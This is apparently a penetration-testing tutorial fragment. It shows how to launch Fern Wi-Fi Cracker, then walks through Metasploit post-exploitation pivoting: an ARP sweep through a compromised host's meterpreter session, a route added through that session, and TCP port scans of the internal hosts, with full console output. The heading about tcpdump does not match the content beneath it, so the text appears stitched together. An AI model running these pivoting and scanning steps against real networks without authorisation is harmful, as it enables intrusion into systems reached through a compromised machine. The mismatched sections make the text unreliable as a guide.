1. Setting up and running Fern wi-fi cracker

After getting it installed, Now open it in admin privileges thus run terminal. And enter the command below.
sudo python /usr/local/bin/Fern-Wifi-Cracker/execute.py

2. Sniffing interfaces with tcpdump

Arp_scanner will perform an ARP scan for a given rangethrough a compromised host.
meterpreter > run arp_scanner -r 192.168.15.1/24
[*] ARP Scanning 192.168.15.1/24
[*] IP: 192.168.15.5 MAC d8:d3:85:d3:8:2d
[*] IP: 192.168.15.3 MAC 0:b:db:1d:d3:2b
[*] IP: 192.168.15.1 MAC 0:17:ee:ca:32:b2
meterpreter > run arp_scanner -r 192.168.0.1/24
[*] ARP Scanning 192.168.0.1/24
[*] IP: 192.168.0.1 MAC 0:9:5b:fa:66:f2
[*] IP: 192.168.0.5 MAC 0:16:6f:79:68:0
[*] IP: 192.168.0.9 MAC 0:90:4b:12:34:4c
[*] IP: 192.168.0.7 MAC 0:21:6a:b5:9a:f0
Next we need to add the route to our meterpreter session. We do these with the route add option in the msf console; you will need to background your meterpreter session:
meterpreter > background
msf exploit(handler) > route add 192.168.15.1 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet 		Netmask	 Gateway
------		 -------		 -------
192.168.15.1 	255.255.255.0 	Session 1
Notice the number 1 at the end of the route add, this describes the meterpreter session we are adding the route to and is very important and implies the tunnel ID. The tunnel ID must match up to our route that we are going to add. You can have many different tunnel IDs to one or several different IP Addresses and it is important to keep them straight.
We need to use a portscanner to discover any open ports on the IP listed from our arp sweep to do this we load the tcp portscanner found in auxiliary tools and run it on the available IP's from the arp sweep:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.15.1
RHOSTS => 192.168.15.1
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
This is where we set our RHOSTS to the IP we want to scan and set the PORTS with the range we
want to scan (1-1024). Then we type run and the results are listed:
msf auxiliary(tcp) > run
[*] 192.168.15.1:22 - TCP OPEN
[*] 192.168.15.1:80 - TCP OPEN
[*] 192.168.15.1:554 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.2
RHOSTS => 192.168.15.2
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.2:22 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.5
RHOSTS => 192.168.15.5
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.5:80 - TCP OPEN
[*] 192.168.15.5:139 - TCP OPEN
[*] 192.168.15.5:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.15.5 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output
msf auxiliary(tcp) >
